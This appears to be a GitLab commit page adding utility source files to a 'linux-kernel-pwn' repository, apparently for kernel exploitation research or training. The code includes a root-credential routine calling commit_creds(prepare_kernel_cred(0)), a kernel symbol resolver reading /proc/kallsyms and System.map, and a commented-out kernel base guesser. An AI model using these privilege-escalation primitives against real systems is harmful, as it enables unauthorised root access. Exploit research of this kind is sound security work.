Skip to content
GitLab
Explore
Sign in
Primary navigation
Search or go to…
Project
L
linux-kernel-pwn
Manage
Activity
Members
Labels
Plan
Issues
Issue boards
Milestones
Wiki
Code
Merge requests
Repository
Branches
Commits
Tags
Repository graph
Compare revisions
Snippets
Build
Pipelines
Jobs
Pipeline schedules
Artifacts
Deploy
Releases
Container registry
Model registry
Operate
Environments
Monitor
Incidents
Service Desk
Analyze
Value stream analytics
Contributor analytics
CI/CD analytics
Repository analytics
Model experiments
Help
Help
Support
GitLab documentation
Compare GitLab plans
Community forum
Contribute to GitLab
Provide feedback
Terms and privacy
Keyboard shortcuts
?
Snippets
Groups
Projects
Show more breadcrumbs
Moritz Eckert
linux-kernel-pwn
Commits
24d7142b
Commit
24d7142b
authored
6 years ago
by
Moritz Eckert
Browse files
Options
Downloads
Patches
Plain Diff
Add util src
parents
No related branches found
No related tags found
No related merge requests found
Changes
2
Show whitespace changes
Inline
Side-by-side
Showing
2 changed files
src/util.c
+129
-0
129 additions, 0 deletions
src/util.c
src/util.h
+26
-0
26 additions, 0 deletions
src/util.h
with
155 additions
and
0 deletions
src/util.c
0 → 100644
+
129
−
0
View file @
24d7142b
#define _GNU_SOURCE
/* See feature_test_macros(7) */
#include
<unistd.h>
#include
<stdlib.h>
#include
<stdio.h>
#include
<sys/ioctl.h>
#include
<sys/uio.h>
#include
<sys/utsname.h>
#include
<string.h>
#include
"util.h"
#define STDOUT 1
char
*
arr
[]
=
{
"0"
,
"1"
,
"2"
,
"3"
,
"4"
,
"5"
,
"6"
,
"7"
,
"8"
,
"9"
,
"a"
,
"b"
,
"c"
,
"d"
,
"e"
,
"f"
};
void
printvalue
(
long
value
)
{
write
(
STDOUT
,
"0x"
,
2
);
write
(
STDOUT
,
arr
[(
value
>>
(
4
*
15
))
&
0xf
],
1
);
write
(
STDOUT
,
arr
[(
value
>>
(
4
*
14
))
&
0xf
],
1
);
write
(
STDOUT
,
arr
[(
value
>>
(
4
*
13
))
&
0xf
],
1
);
write
(
STDOUT
,
arr
[(
value
>>
(
4
*
12
))
&
0xf
],
1
);
write
(
STDOUT
,
arr
[(
value
>>
(
4
*
11
))
&
0xf
],
1
);
write
(
STDOUT
,
arr
[(
value
>>
(
4
*
10
))
&
0xf
],
1
);
write
(
STDOUT
,
arr
[(
value
>>
(
4
*
9
))
&
0xf
],
1
);
write
(
STDOUT
,
arr
[(
value
>>
(
4
*
8
))
&
0xf
],
1
);
write
(
STDOUT
,
arr
[(
value
>>
(
4
*
7
))
&
0xf
],
1
);
write
(
STDOUT
,
arr
[(
value
>>
(
4
*
6
))
&
0xf
],
1
);
write
(
STDOUT
,
arr
[(
value
>>
(
4
*
5
))
&
0xf
],
1
);
write
(
STDOUT
,
arr
[(
value
>>
(
4
*
4
))
&
0xf
],
1
);
write
(
STDOUT
,
arr
[(
value
>>
(
4
*
3
))
&
0xf
],
1
);
write
(
STDOUT
,
arr
[(
value
>>
(
4
*
2
))
&
0xf
],
1
);
write
(
STDOUT
,
arr
[(
value
>>
(
4
*
1
))
&
0xf
],
1
);
write
(
STDOUT
,
arr
[(
value
>>
(
4
*
0
))
&
0xf
],
1
);
}
void
set_root_creds
(
void
)
{
commit_creds
(
prepare_kernel_cred
(
0
));
}
//unsigned long *find_kernel_base(void) {
// unsigned long *kernel_base;
// unsigned long addrs[] = {
// 0x80000000,
// 0xc0000000,
// #ifdef X64
// 0xffffffff81000000,
// #endif
// };
// void *map;
// int i;
//
// for (i = 0; i < ARRAY_SIZE(addrs); i++) {
// map = mmap((void *)addrs[i], 0x1000, PROT_NONE,
// MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);
// if (map == MAP_FAILED) {
// kernel_base = (unsigned long *)addrs[i];
// printf("Guess kernel base @ %p\n", kernel_base);
// return kernel_base;
// }
// munmap((void *)addrs[i], 0x1000);
// }
//
// printf("Can't guess kernel base\n");
// exit(EXIT_FAILURE);
//}
unsigned
long
get_kernel_sym
(
char
*
name
)
{
FILE
*
f
;
unsigned
long
addr
;
char
dummy
;
char
sname
[
512
];
struct
utsname
ver
;
int
ret
;
int
rep
=
0
;
int
oldstyle
=
0
;
f
=
fopen
(
"/proc/kallsyms"
,
"r"
);
if
(
f
==
NULL
)
{
f
=
fopen
(
"/proc/ksyms"
,
"r"
);
if
(
f
==
NULL
)
goto
fallback
;
oldstyle
=
1
;
}
repeat:
ret
=
0
;
while
(
ret
!=
EOF
)
{
if
(
!
oldstyle
)
ret
=
fscanf
(
f
,
"%p %c %s
\n
"
,
(
void
**
)
&
addr
,
&
dummy
,
sname
);
else
{
ret
=
fscanf
(
f
,
"%p %s
\n
"
,
(
void
**
)
&
addr
,
sname
);
if
(
ret
==
2
)
{
char
*
p
;
if
(
strstr
(
sname
,
"_O/"
)
||
strstr
(
sname
,
"_S."
))
continue
;
p
=
strrchr
(
sname
,
'_'
);
if
(
p
>
((
char
*
)
sname
+
5
)
&&
!
strncmp
(
p
-
3
,
"smp"
,
3
))
{
p
=
p
-
4
;
while
(
p
>
(
char
*
)
sname
&&
*
(
p
-
1
)
==
'_'
)
p
--
;
*
p
=
'\0'
;
}
}
}
if
(
ret
==
0
)
{
fscanf
(
f
,
"%s
\n
"
,
sname
);
continue
;
}
if
(
!
strcmp
(
name
,
sname
))
{
fprintf
(
stdout
,
"[+] Resolved %s to %p%s
\n
"
,
name
,
(
void
*
)
addr
,
rep
?
" (via System.map)"
:
""
);
fclose
(
f
);
return
addr
;
}
}
fclose
(
f
);
if
(
rep
)
return
0
;
fallback:
uname
(
&
ver
);
if
(
strncmp
(
ver
.
release
,
"2.6"
,
3
))
oldstyle
=
1
;
sprintf
(
sname
,
"/boot/System.map-%s"
,
ver
.
release
);
f
=
fopen
(
sname
,
"r"
);
if
(
f
==
NULL
)
return
0
;
rep
=
1
;
goto
repeat
;
}
This diff is collapsed.
Click to expand it.
src/util.h
0 → 100644
+
26
−
0
View file @
24d7142b
#ifndef CRACKER_H
#define CRACKER_H
#include
<stdint.h>
void
printvalue
(
long
value
);
struct
cred
{
uint32_t
usage
;
uint32_t
uid
;
/* real UID of the task */
uint32_t
gid
;
/* real GID of the task */
uint32_t
suid
;
/* saved UID of the task */
uint32_t
sgid
;
/* saved GID of the task */
uint32_t
euid
;
/* effective UID of the task */
uint32_t
egid
;
/* effective GID of the task */
uint32_t
fsuid
;
/* UID for VFS ops */
uint32_t
fsgid
;
/* GID for VFS ops */
};
void
*
(
*
commit_creds
)(
void
*
);
void
*
(
*
prepare_kernel_cred
)(
void
*
);
void
set_root_creds
(
void
)
;
unsigned
long
get_kernel_sym
(
char
*
name
);
unsigned
long
*
find_kernel_base
(
void
);
#endif
This diff is collapsed.
Click to expand it.
Preview
0%
Loading
Try again
or
attach a new file
.
Cancel
You are about to add
0
people
to the discussion. Proceed with caution.
Finish editing this message first!
Save comment
Cancel
Please
register
or
sign in
to comment
